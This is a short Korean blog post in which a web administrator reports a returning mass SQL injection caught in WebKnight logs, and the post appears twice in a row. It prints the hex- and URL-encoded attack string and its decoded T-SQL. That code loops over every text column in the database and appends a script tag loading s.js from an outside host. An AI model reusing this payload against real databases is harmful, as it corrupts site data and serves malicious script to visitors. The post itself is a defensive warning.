최근에 다시 들어오기 시작하는 sql Injection
IT/sql Injection최근에 다시 들어오기 시작하는 sql Injection
dEcLaRe%20@S%20VaRcHaR(4000)%20SeT%20@s=cAsT(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F4375727 36F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6 C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F52206 22E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F7220 4645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F53544154555 33D302920424547494E20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E56455254 28564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F732E6361776A622E636F6D2F732E6A73
웹나이트를 써서 그런지 로그가 짤리는데, 우선 내용을 확인하면
DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''<script src=http://s.cawjb.com/s.js
위에 내용을 보면 마지막에 스크립트가 있습니다. 최근까지 들어오는것과 다른 스크립트가 삽입되어서 다시 들어오기 시작하고 있습니다.
이런 sql Injection 공격을 하는놈들 어떻게 해야할지,, 그리고, 좀비서버들이 왜 이리 많은지,, IP Search를 해보면, 한국IP도 많은것 같습니다. 제발 보안에 좀 신경을 쓰셔서 우회해서 들어오는것이 없도록 해야할것 같습니다.
dEcLaRe%20@S%20VaRcHaR(4000)%20SeT%20@s=cAsT(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F4375727 36F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6 C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F52206 22E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F7220 4645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F53544154555 33D302920424547494E20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E56455254 28564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F732E6361776A622E636F6D2F732E6A73
웹나이트를 써서 그런지 로그가 짤리는데, 우선 내용을 확인하면
DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''<script src=http://s.cawjb.com/s.js
위에 내용을 보면 마지막에 스크립트가 있습니다. 최근까지 들어오는것과 다른 스크립트가 삽입되어서 다시 들어오기 시작하고 있습니다.
이런 sql Injection 공격을 하는놈들 어떻게 해야할지,, 그리고, 좀비서버들이 왜 이리 많은지,, IP Search를 해보면, 한국IP도 많은것 같습니다. 제발 보안에 좀 신경을 쓰셔서 우회해서 들어오는것이 없도록 해야할것 같습니다.